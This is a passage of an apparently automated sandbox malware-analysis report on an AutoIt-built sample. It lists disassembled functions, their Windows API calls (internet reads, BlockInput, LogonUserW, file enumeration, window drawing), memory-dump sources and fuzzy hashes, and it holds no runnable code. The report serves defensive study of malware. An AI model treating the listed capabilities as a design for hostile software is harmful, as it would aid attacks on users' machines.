                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                          • String ID:
                                                                          • API String ID: 48322524-0
                                                                          • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                          • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                          • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                          • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                          Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                          • String ID:
                                                                          • API String ID: 901099227-0
                                                                          • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                          • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                          • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                          • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                          Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Proc
                                                                          • String ID:
                                                                          • API String ID: 2346855178-0
                                                                          • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                          • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                          • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                          • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                          Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • BlockInput.USER32(00000001), ref: 0045A38B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: BlockInput
                                                                          • String ID:
                                                                          • API String ID: 3456056419-0
                                                                          • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                          • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                          • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                          • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                          Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: LogonUser
                                                                          • String ID:
                                                                          • API String ID: 1244722697-0
                                                                          • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                          • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                          • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                          • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                          Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                          • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                          • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                          • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                          Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                          • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                          • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                          • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                          Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N@
                                                                          • API String ID: 0-1509896676
                                                                          • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                          • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                          • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                          • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                          Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                          • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                          • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                          • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                          Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                          • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                          • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                          Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                          • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                          • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                          Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                          • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                          • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                          Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteObject.GDI32(?), ref: 0045953B
                                                                          • DeleteObject.GDI32(?), ref: 00459551
                                                                          • DestroyWindow.USER32(?), ref: 00459563
                                                                          • GetDesktopWindow.USER32 ref: 00459581
                                                                          • GetWindowRect.USER32(00000000), ref: 00459588
                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                          • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                          • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                          • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                          • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                          • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                          • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                          • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                          • _wcslen.LIBCMT ref: 00459916
                                                                          • _wcscpy.LIBCMT ref: 0045993A
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                          • GetDC.USER32(00000000), ref: 004599FC
                                                                          • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                          • API String ID: 4040870279-2373415609
                                                                          • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                          • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                          • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                          • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                          Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(00000012), ref: 0044181E
                                                                          • SetTextColor.GDI32(?,?), ref: 00441826
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                          • GetSysColor.USER32(0000000F), ref: 00441849
                                                                          • SetBkColor.GDI32(?,?), ref: 00441864
                                                                          • SelectObject.GDI32(?,?), ref: 00441874
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                          • GetSysColor.USER32(00000010), ref: 004418B2
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                          • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                          • DeleteObject.GDI32(?), ref: 004418D5
                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                          • FillRect.USER32(?,?,?), ref: 00441970
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                            • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                            • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
